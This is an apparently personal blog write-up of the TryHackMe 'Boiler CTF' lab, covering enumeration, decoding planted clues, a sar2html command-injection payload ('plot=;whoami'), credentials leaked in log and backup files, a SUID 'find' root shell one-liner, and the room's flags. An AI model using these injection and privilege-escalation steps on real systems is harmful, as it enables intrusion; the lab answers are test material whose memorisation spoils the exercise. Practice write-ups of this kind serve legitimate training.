Boiler CTF TryHackMe
Hello folks! I am Ashutosh Gupta a.k.a “m3ta_c1ph4r” . I am doing Tryhackme from the last two months . I can say that this is the best place for the beginners and intermediate. There are many rooms in that you can practise and polish your skills. There are rooms on every topic labeling from easy to hard and step by step exploitation of machine. This is my first writeup of Tryhackme on medium. So lets begin the fun!
Link for the room https://tryhackme.com/room/boilerctf2
So firstly you have to join the room then deploy it.
TASK 1 : ENUMERATION
- NMAP:
As many of you know firstly we do is nmap. So the command is
$ nmap -sC -sV 10.10.32.78 -oN nmapStarting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 16:55 IST
Nmap scan report for 10.10.32.78
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.82.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.56 seconds
sC is used for script scan i.e to search the scripts
sV is used for versions scan to determine service/version info
Here you see there are three open ports. As you can see in FTP anonymous login is allowed . So lets check if we find anything in this.
$ ftp 10.10.32.78Using this command we will log into then it will ask for name , give it anonymous . Then you will be login to the FTP.
Then we will check the files and directories present using ls command. As you will type you see there is no files and directories present. So lets check hidden one. We will do this using ls -la command.
- l -means to give the output in list format
- a -means to show all the files including chown and hidden one.
As when you will type this you will see a hidden file name info.txt. Then if you think open that file then you can’t because ftp is file transfer protocol. So you can download it using command get .info.txt.
Then type exit. And you see you have that file in you pc.
And here you get the first answer of Task 1.
Task 1–1:
txtTask 1–2:
nmap -p- <machine ip>Here you got the highest port 55007. And there you say ssh is running.
Task 1–3:
In the nmap you see
10000/tcp open http MiniServ 1.930 (Webmin httpd)
webmin is runningTask 1–4:
Google the exploit of webmin. On checking it, you will find their in no exploit available for that version of service. The service is up to date.Lets come back to the file we got from ftp
$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!As you will what is this. So let me clear you that this is encoded text. This is ROT13. It is substitution cipher that replaces a letter with the 13th letter after it. Lets decode it . I used this website to decode it.
There you get this after decoding this.
Just wanted to see if you find it. Lol. Remember: Enumeration is the key!It just says that enumeration is the key which means we have to do more enumeration.
- Gobuster
lets do directory fuzzing. For this I used gobutser.
gobuster dir -u http://10.10.32.78/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,xml -t 100 2>\dev\null===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.32.78/
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,xml,php,html
[+] Timeout: 10s
===============================================================
2020/08/16 17:51:00 Starting gobuster
===============================================================
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)
dir -means directory fuzzing
u -is used for giving the url or target.
w -is used for giving the wordlist path.
x -is used to search the files having those extensions
t -is used for giving threads to increase the speed of scan
Lets check what we got in the robots.txt
User-agent: *
Disallow: /
/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it
079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075If you open all the directories you get not found because these all ae rabit holes. So lets see what is these numbers are. Lets decode it.
Firstly we will do use ASCII to TEXT using this link. http://www.unit-conversion.info/texttools/ascii/#data
We got this after decoding
OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQKThen use use cyberchef to decode it from text to base64.
After decoding we got hash.
99b0660cd95adea327c54182baa51584Then I used crackstation to crack this. https://crackstation.net/
After decoding I got that this md5 hash. So the decoded text is
kiddingSo here it might be the password. But of what we don’t know.
So see other thing we got in gobuster. We have two directories name joomla and mannual. Lets check what is joomla in the google.
Task 1–5:
So as you google joomla you got that joomla is CMS.
So your answer for this is "joomla"Lets enumrate more. As joomla is a sub-directory so we can do sub directory fuzzing.
gobuster dir -u http://<ip>/joomla -w /usr/share/dirb/wordlists/common.txt -t 50[+] Url: http://10.10.2.36/joomla
[+] Threads: 50
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/16 20:43:44 Starting gobuster
===============================================================
/_files (Status: 301)
/_test (Status: 301)
/~www (Status: 301)
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/_archive (Status: 301)
/_database (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/installation (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/index.php (Status: 200)
/templates (Status: 301)
/tests (Status: 301)
/tmp (Status: 301)==================================================================
As there quite many directories so after analyzing all the directories I find one directory name “/_test”.
On the left you see “sar2html”. So I search this on google. And there I found a exploit on exploit-db. https://www.exploit-db.com/exploits/47204
In this exploit you can do Remote code execution(RCE).
http://<ipaddr>/index.php?plot=;<command-here> will execute
http://10.10.2.36/joomla/_test/index.php?plot=;whoamiWhen you click on select host you see in the last item you see the name of the user i.e www-data.
Then I thought to see which files are on the server. So I do ls command.
Task 1–6:
Here we find four but the different one log.txt.
So the answer is log.txtSo I open that using cat log.txt.
So in the sixth option you see there is a username and password.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$So the username : basterd and password : superduperp@$$
Now we can do ssh as we know the username and password and host.
And Boom! you got the shell.
Task 2: POST Enumeration
TASK 2–1 :
As you have the shell lets check the files and directories. There you find one file name backup.sh.
lets check what is in the backup.sh
$ cat backup.sh
REMOTE=1.2.3.4SOURCE=/home/stoner
TARGET=/usr/local/backupLOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`USER=stoner
#superduperp@$$no1knowsssh $USER@$REMOTE mkdir $TARGET/$DATEif [ -d "$SOURCE" ]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOGif [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
doneelseecho "Directory is not present" >> $LOG
exit 0
fi
So if you see there you find another user and password.
USER=stoner
superduperp@$$no1knows
So the answer for the task 2–1is backup because it doesn’t ask for the extension and the question ask where the another user and password is stored.
answer is: backupLets login with stoner using ssh.
Task 2–2:
Lets find the user flag. As mostly user flag is in home/<username>
So lets go there. cd /home/stoner
And do ls -la to check what files and directories we are having.
stoner@Vulnerable:~$ ls -la
total 20
drwxr-x--- 4 stoner stoner 4096 Aug 16 19:13 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
drwx------ 2 stoner stoner 4096 Aug 16 19:13 .cache
drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secretHere we got one hidden file lets see what is this.
stoner@Vulnerable:~$ cat .secret
You made it till here, well done.So the user flag is
You made it till here, well done.Task 2 Privilege Escalation:
So we are in the end of our session. So lets do.
In the privilege escalation my methodology is to check the SUID.
find / -perm -u=s 2>/dev/null/ -is the llocation that is to check in all the file system
perm -is for the permission that is having root access.
u=s -is to check which user here s is root
2>/dev/null -is for the error i.e it will not show the errors it will send all the errors to /dev/null which is blackhole in the linux.
So lets see the output
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmapSo these are the binaries we can run under root. So for finding the exploit there is a best I would say name GTFOBins. https://gtfobins.github.io/
So you can search all this on gtfobins and if you found SUID tag there then it is vulnerable.
Task 2–3:
As I have searched randomly and I found one name find. So lets try this.
So the answer for this is - findBut if you copy the this command sudo sh -c 'cp $(which find) .; chmod +s ./find' you get error.
So because of this you can’t run the second one. As if you see in the last one it is opening a ./find file but we haven’t made this. But we can try without ./ as we find command exist.
find . -exec /bin/sh -p \; -quitSo lets copy this and paste it . And crossed finger if it works or not.
And boom! we got the root :)
Task 2–4:
So we can take root flag.
# cd /root
# ls
root.txt
# cat root.txt
It wasn't that hard, was it?So the root flag is :
It wasn't that hard, was it?I hope you enjoyed this and learned something. It was a fun CTF with lot f trolling.
So see you again!
Linkedin profile : www.linkedin.com/in/ashutosh-gupta-152142193
Instagram profile for the updates : https://www.instagram.com/gupta_ashuu/
